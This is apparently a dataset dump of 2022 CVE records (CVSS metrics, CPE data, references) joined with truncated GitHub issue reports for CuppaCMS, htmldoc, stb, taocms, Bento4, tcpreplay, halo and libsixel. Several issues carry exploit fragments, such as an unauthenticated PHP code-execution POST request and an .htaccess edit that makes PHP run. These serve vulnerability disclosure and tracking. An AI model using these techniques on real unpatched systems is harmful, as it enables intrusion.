{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Unauthorized attacker can execute arbitrary php code via `/classes/ajax/Functions.php`, `saveConfigData` function ## poc ``` POST /classes/ajax/Functions.php HTTP/1.1 Host: localhost:8888 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1097 Coo...
Unauthorized Remote Code Execution vulnerability exists in CuppaCMS via saveConfigData function
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/29/comments
0
2022-02-19T17:39:40Z
2022-02-19T17:39:40Z
https://github.com/CuppaCMS/CuppaCMS/issues/29
1,144,803,337
29
CVE-2021-23158
2022-03-16T15:15:10.100
A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967018" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.12:*:*:*:*:*:*:*", "matchCriteriaId": "645554AD-DA7C-4B11-864A-89F423B08291", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
https://github.com/michaelrsweet/htmldoc/issues/414
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a double-free in pspdf_export test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc3.html poc(zipped for update): [poc3.zip](ht...
AddressSanitizer: double-free in function pspdf_export ps-pdf.cxx:945:7
https://api.github.com/repos/michaelrsweet/htmldoc/issues/414/comments
3
2021-01-26T08:44:03Z
2022-06-09T02:03:19Z
https://github.com/michaelrsweet/htmldoc/issues/414
794,045,003
414
CVE-2021-23165
2022-03-16T15:15:10.157
A flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE"...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967014" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D1CE1F4-17A1-430E-9C8B-0CE88A07514B", "versionEndExcluding": "1.9.12", "versionEndIncluding": null, "versionSta...
https://github.com/michaelrsweet/htmldoc/issues/413
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a heap-buffer-overflow in the pspdf_prepare_outpages() ,in ps-pdf.cxx:1338:15 test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf po...
AddressSanitizer: heap-buffer-overflow in pspdf_prepare_outpages() in ps-pdf.cxx:1338:15
https://api.github.com/repos/michaelrsweet/htmldoc/issues/413/comments
3
2021-01-26T08:39:00Z
2022-06-09T02:04:10Z
https://github.com/michaelrsweet/htmldoc/issues/413
794,041,949
413
CVE-2022-25514
2022-03-17T01:15:06.977
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
https://github.com/nothings/stb/issues/1286
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function ttUSHORT() at stb_truetype.h:1286 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPL...
heap-buffer-overflow in function ttUSHORT() at stb_truetype.h:1286
https://api.github.com/repos/nothings/stb/issues/1286/comments
1
2022-02-16T15:20:17Z
2022-02-17T06:54:48Z
https://github.com/nothings/stb/issues/1286
1,140,162,314
1,286
CVE-2022-25515
2022-03-17T01:15:07.020
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
https://github.com/nothings/stb/issues/1288
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function ttLONG() at stb_truetype.h:1288 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPLEM...
heap-buffer-overflow in function ttULONG() at stb_truetype.h:1288
https://api.github.com/repos/nothings/stb/issues/1288/comments
1
2022-02-16T15:32:13Z
2022-02-17T06:55:53Z
https://github.com/nothings/stb/issues/1288
1,140,194,570
1,288
CVE-2022-25516
2022-03-17T01:15:07.063
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
https://github.com/nothings/stb/issues/1287
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function stbtt__find_table () at stb_truetype.h:1313 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRU...
heap-buffer-overflow in function stbtt__find_table at stb_truetype.h:1313
https://api.github.com/repos/nothings/stb/issues/1287/comments
1
2022-02-16T15:29:22Z
2022-02-17T06:55:46Z
https://github.com/nothings/stb/issues/1287
1,140,187,875
1,287
CVE-2022-25578
2022-03-18T23:15:07.710
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Product", "URL Repurposed" ], "url": "http://taocms.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/28" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
We click on file management to go to the management location of the website and directory. ![image](https://user-images.githubusercontent.com/54017627/154784040-c571d842-3a18-49b2-a697-41858984921b.png) Click to edit the .htaccess file and add a line at the end, 'AddType application/x-httpd-php.php3', click Save....
Code injection caused by arbitrary file editing vulnerability in taocms3.0.2
https://api.github.com/repos/taogogo/taocms/issues/28/comments
0
2022-02-19T03:32:57Z
2022-02-19T03:32:57Z
https://github.com/taogogo/taocms/issues/28
1,144,266,602
28
CVE-2022-25505
2022-03-21T00:15:07.763
Taocms v3.0.2 was discovered to contain a SQL injection vulnerability via the id parameter in \include\Model\Category.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
Vulnerability file address: \include\Model\Category.php ![1](https://user-images.githubusercontent.com/90141086/154260116-5f89f068-229c-4d04-81fd-7b961038dd3d.png) It can be seen that the update function does not filter the id. After obtaining the id with the columnsdata function, it is brought into the updatelist f...
taocms3.0.2 SQL injection exists in the background
https://api.github.com/repos/taogogo/taocms/issues/27/comments
0
2022-02-16T12:15:56Z
2022-02-16T12:15:56Z
https://github.com/taogogo/taocms/issues/27
1,139,936,510
27
CVE-2022-27607
2022-03-21T23:15:08.770
Bento4 1.6.0-639 has a heap-based buffer over-read in the AP4_HvccAtom class, a different issue than CVE-2018-14531.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/677" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/axiomatic-systems/Bento4/issues/677
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
## brief description There is a buffer overflow in AP4_HvccAtom, can be triggered via mp4tag + ASan. ## To reproduce ``` mkdir build && pushd build CC=clang CFLAGS="-fsanitize=address" CXX=clang CXXFLAGS="-fsanitize=address" cmake .. && make -j$(nproc) ./mp4tag --list-symbols --list-keys --show-tags $POC ``` ...
[BUG] Heap buffer overflow in AP4_HvccAtom, mp4tag
https://api.github.com/repos/axiomatic-systems/Bento4/issues/677/comments
2
2022-03-13T16:49:47Z
2022-08-25T07:59:03Z
https://github.com/axiomatic-systems/Bento4/issues/677
1,167,633,442
677
CVE-2022-25484
2022-03-22T17:15:07.993
tcpprep v4.4.1 has a reachable assertion (assert(l2len > 0)) in packet2tree() at tree.c in tcpprep v4.4.1.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/715
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** The assertion `assert(l2len > 0);` in packet2tree() at tree.c is reachable when the user uses tcpprep to open a crafted pcap file. The variable `l2len` is assigned in get_l2len_protocol() at get.c. https://github.com/appneta/tcpreplay/blob/09f07748dcabe3d58961f123f31dd0f75198a389/src/tree.c#L...
[Bug] Reachable assertion in packet2tree()
https://api.github.com/repos/appneta/tcpreplay/issues/715/comments
3
2022-02-15T07:37:33Z
2024-06-04T03:48:19Z
https://github.com/appneta/tcpreplay/issues/715
1,138,300,619
715
CVE-2022-23880
2022-03-23T21:15:07.937
An arbitrary file upload vulnerability in the File Management function module of taoCMS v3.0.2 allows attackers to execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
This is the latest 3.0.2 version of taocms. Organize and utilize steps in two steps: **Step1:** Audit the source code E:\xxx\taocms-3.0.2\include\Model\File.php, line 96, and find that there may be arbitrary new files vulnerability: ![a](https://user-images.githubusercontent.com/43668218/150085971-dd25b15b-f35d...
A malicious file upload vulnerability exists in File.php of the file management function module.
https://api.github.com/repos/taogogo/taocms/issues/25/comments
0
2022-01-19T07:45:25Z
2022-01-19T07:45:25Z
https://github.com/taogogo/taocms/issues/25
1,107,764,180
25
CVE-2021-43659
2022-03-24T14:15:09.030
In halo 1.4.14, the function point of uploading the avatar, any file can be uploaded, such as uploading an HTML file, which will cause a stored XSS vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/1522" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.4.14:*:*:*:*:*:*:*", "matchCriteriaId": "7D36DB6A-9235-47C5-9F6E-B7A191C17408", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding":...
https://github.com/halo-dev/halo/issues/1522
[ "Exploit", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
### What is version of Halo has the issue? 1.4.13 ### What database are you using? Other ### What is your deployment method? Fat Jar ### Your site address. _No response_ ### What happened? At the function point of uploading the avatar, any file can be uploaded, such as uploading an HTML file, which will cause ...
Arbitrary file upload in the backend could cause a stored XSS vulnerability.
https://api.github.com/repos/halo-dev/halo/issues/1522/comments
1
2021-11-09T07:20:53Z
2021-11-10T02:10:18Z
https://github.com/halo-dev/halo/issues/1522
1,048,270,068
1,522
CVE-2022-27938
2022-03-26T13:15:07.537
stb_image.h (aka the stb image loader) 2.19, as used in libsixel and other products, has a reachable assertion in stbi__create_png_image_raw.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:2.19:*:*:*:*:*:*:*", "matchCriteriaId": "8D67A6AE-01D4-4D23-A02B-960CF2DA4999", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
https://github.com/saitoha/libsixel/issues/163
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
***Describe the bug*** There is a reachable assert bug found in stbi__create_png_image_raw, can be triggered via img2sixel+ ASan ***To Reproduce*** compile the program with CFLAGS="-fsanitize=address" CC=clang then run `./img2sixel $POC` output: ``` img2sixel: ./stb_image.h:4374: int stbi__create_png_image_raw...
[BUG] a reachable assert in stbi__create_png_image_raw
https://api.github.com/repos/saitoha/libsixel/issues/163/comments
0
2022-03-19T20:57:10Z
2022-08-03T09:44:38Z
https://github.com/saitoha/libsixel/issues/163
1,174,370,075
163
CVE-2022-27939
2022-03-26T13:15:07.700
tcprewrite in Tcpreplay 4.4.1 has a reachable assertion in get_layer4_v6 in common/get.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/717" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/717
[ "Exploit", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tc...
[Bug] Reachable assertion in get_layer4_v6
https://api.github.com/repos/appneta/tcpreplay/issues/717/comments
2
2022-03-04T08:24:03Z
2022-08-03T09:43:40Z
https://github.com/appneta/tcpreplay/issues/717
1,159,375,793
717
CVE-2022-27940
2022-03-26T13:15:07.750
tcprewrite in Tcpreplay 4.4.1 has a heap-based buffer over-read in get_ipv6_next in common/get.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/718" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/718
[ "Exploit", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tc...
[Bug] heap-overflow in get_ipv6_next
https://api.github.com/repos/appneta/tcpreplay/issues/718/comments
1
2022-03-04T08:32:27Z
2022-08-04T21:35:08Z
https://github.com/appneta/tcpreplay/issues/718
1,159,382,806
718
CVE-2022-27941
2022-03-26T13:15:07.800
tcprewrite in Tcpreplay 4.4.1 has a heap-based buffer over-read in get_l2len_protocol in common/get.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/716" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/716
[ "Exploit", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tc...
[Bug] heap-overflow in get_l2len_protocol
https://api.github.com/repos/appneta/tcpreplay/issues/716/comments
2
2022-03-03T19:41:11Z
2022-08-03T09:43:54Z
https://github.com/appneta/tcpreplay/issues/716
1,158,825,975
716
CVE-2022-27942
2022-03-26T13:15:07.850
tcpprep in Tcpreplay 4.4.1 has a heap-based buffer over-read in parse_mpls in common/get.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/719" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/719
[ "Exploit", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tc...
[Bug] heap buffer overflow in parse_mpls
https://api.github.com/repos/appneta/tcpreplay/issues/719/comments
1
2022-03-14T09:44:16Z
2022-08-05T01:57:19Z
https://github.com/appneta/tcpreplay/issues/719
1,168,123,325
719
CVE-2022-24191
2022-04-04T11:15:08.187
In HTMLDOC 1.9.14, an infinite loop in the gif_read_lzw function can lead to a pointer arbitrarily pointing to heap memory and resulting in a buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/470" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/l...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "76FBE339-551C-4C28-B91E-6E18D158C9C7", "versionEndExcluding": "1.9.15", "versionEndIncluding": null, "versionSta...
https://github.com/michaelrsweet/htmldoc/issues/470
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Due to an infinite loop in the `gif_read_lzw` function, the `sp` variable which belongs heap memory can be arbitrarily modified. The crash happens in this loop: ``` while (code >= clear_code) { *sp++ = table[1][code]; if (code == table[0][code]) return (255); code = table[0][code]...
Stack Buffer Overflow in gif_read_lzw
https://api.github.com/repos/michaelrsweet/htmldoc/issues/470/comments
1
2022-01-25T18:17:46Z
2022-01-26T09:59:54Z
https://github.com/michaelrsweet/htmldoc/issues/470
1,114,217,759
470
CVE-2022-26619
2022-04-05T01:15:09.523
Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/1702" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.4.17:*:*:*:*:*:*:*", "matchCriteriaId": "2E6AE9B0-512B-4E21-9B40-81CDAD04AB9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding":...
https://github.com/halo-dev/halo/issues/1702
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
### 是什么版本出现了此问题? 1.4.17 ### 使用的什么数据库? MySQL 5.7 ### 使用的哪种方式部署? Fat Jar ### 在线站点地址 https://demo.halo.run/admin/index.html#/comments ### 发生了什么? The vulnerability can lead to the upload of arbitrary malicious script files. ### 相关日志输出 ```shell no ``` ### 附加信息 Black-box penetration: 1. Use (demo:P@ssw0rd123.....
Halo Blog CMS1.4.17 Fileupload without file type authentication
https://api.github.com/repos/halo-dev/halo/issues/1702/comments
1
2022-03-04T10:30:01Z
2023-06-05T08:10:17Z
https://github.com/halo-dev/halo/issues/1702
1,159,491,122
1,702
CVE-2021-41752
2022-04-05T16:15:12.590
